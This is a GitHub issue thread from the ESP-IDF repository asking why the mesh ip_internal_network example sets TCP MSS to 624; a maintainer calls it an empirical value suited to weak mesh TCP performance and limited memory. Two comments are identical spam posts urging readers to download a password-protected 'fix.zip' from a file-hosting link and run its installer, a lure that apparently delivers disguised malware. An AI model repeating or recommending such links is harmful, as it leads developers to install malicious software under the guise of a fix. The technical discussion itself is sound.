### ISSUE TITLE
[mesh] CONFIG_LWIP_TCP_MSS=624 in ip_internal_network (IDFGH-13554)

### ISSUE THREAD

**Issue by KonssnoK** [espressif/esp-idf#14443]
### Answers checklist.

- [X] I have read the documentation [ESP-IDF Programming Guide](https://docs.espressif.com/projects/esp-idf/en/latest/) and the issue is not addressed there.
- [X] I have updated my IDF branch (master or release) to the latest version and checked that the issue is present there.
- [X] I have searched the issue tracker for a similar issue and not found a similar issue.

### General issue report

As per title,
CONFIG_LWIP_TCP_MSS is set to 624 in the ip_internal_network example, which is quite lower than the maximum allowed mesh size, 1416.

Could we have some explanation for this?

How was this value computed?
Is it dependent on the number of allowed nodes?

Thanks!

@zhangyanjiaoesp

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by zhangyanjiaoesp** [comment]
The TCP performance in a mesh network is poor. Setting TCP MSS to 624 is intended to improve performance by using smaller packets. In STA+softAP mode, TCP itself doesn’t perform well (due to insufficient memory). With more nodes, the situation gets even worse. Therefore, MSS 624 is a universal solution and is applicable regardless of the number of nodes.

**Comment by zhangyanjiaoesp** [comment]
@KonssnoK 
I'm sorry this example is not written by me, but I think this value is probably an empirical value without complicated calculation.

**Comment by KonssnoK** [comment]
Ok thanks,
I was hoping for some obscure documentation hidden somewhere :)

Smaller packets is supposed also to improve probability of transmission in hte mesh or is it correlated mainly to the memory usage? 
We currently use 1416 as MSS but also we have 8MB of RAM, so memory consumption is not really a problem for our system.

**Comment by KonssnoK** [comment]
@zhangyanjiaoesp actually we are discussing with LTE providers and it seems we will have to decrease it to 1360 maximum in order to allow virtual operators to work correctly

**Comment by zhangyanjiaoesp** [comment]
@KonssnoK can we close this issue?

**Comment by KonssnoK** [comment]
yes, we reduced MTU to the minimum IPv6 size to increase compatibility everywhere
